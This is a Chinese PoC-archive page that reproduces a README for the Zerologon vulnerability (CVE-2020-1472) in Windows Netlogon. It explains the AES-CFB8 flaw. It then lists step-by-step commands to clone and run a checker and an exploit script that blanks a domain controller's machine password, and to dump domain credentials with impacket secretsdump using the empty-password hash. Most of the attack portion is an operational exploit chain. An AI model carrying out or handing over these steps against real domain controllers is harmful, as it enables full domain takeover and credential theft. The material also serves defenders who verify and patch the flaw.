关联漏洞
标题:
Microsoft Windows Netlogon 安全特征问题漏洞
(CVE-2020-1472)
描述:Microsoft Windows Netlogon是美国微软(Microsoft)公司的Windows的一个重要组件,主要功能是用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Microsoft Windows Netlogon 存在安全漏洞。攻击者可以使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器的易受攻击的 Netlogon 安全通道连接并进行特权提升。
描述
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)
介绍
<b>[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privilege Escalation (Zerologon)</b>
The attack described here takes advantage of flaws in a cryptographic authentication protocol (insecure use of AES-CFB8) that proves the authenticity and identity of a domain-joined computer to the Domain Controller (DC). Due to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the DC itself) and set an empty password (simply sending a number of Netlogon messages in which various fields are filled with zeroes) for that account in the domain. This can then be used to obtain domain admin credentials and then restore the original DC password.
<b>In order to checking CVE-2020-1472</b>
- [X] git clone https://github.com/SecuraBV/CVE-2020-1472.git
- [X] cd CVE-2020-1472
- [X] python3 -m venv env
- [X] source env/bin/activate
- [X] pip install -r requirements.txt
- [X] python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (example: ./zerologon_tester.py DC01 172.16.208.161)
<b>In order to exploit CVE-2020-1472</b>
- [X] git clone https://github.com/dirkjanm/CVE-2020-1472.git
- [X] cd CVE-2020-1472
- [X] python3 -m venv env
- [X] source env/bin/activate
- [X] python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (example: ./cve-2020-1472-exploit.py DC01 172.16.208.161)
- [X] git clone https://github.com/SecureAuthCorp/impacket.git
- [X] cd impacket
- [X] pip install .
- [X] python setup.py install
- [X] cd examples
<b>Then, run one of the following command</b><br>
<b>Example format 1:</b> python secretsdump.py domain/example-dc\$@fqdn-of-dc<br>
```./secretsdump.py zerologon.local/DC01\$@DC01.zerologon.local -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc```<br>
<b>Example format 2:</b> python secretsdump.py domain/example-dc\$@ip-of-dc<br>
```./secretsdump.py zerologon.local/DC01\$@172.16.208.161 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc```
Original blogpost is available [here](https://www.secura.com/pathtoimg.php?id=2055)<br>
Original repository that includes python test script is available [here](https://github.com/SecuraBV/CVE-2020-1472)<br>
Original repository that includes python exploit script is available [here](https://github.com/dirkjanm/CVE-2020-1472)
文件快照
[4.0K] /data/pocs/bc85c4d415a6a383719ff134e37071dbb3799577
├── [978K] poc.png
└── [2.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。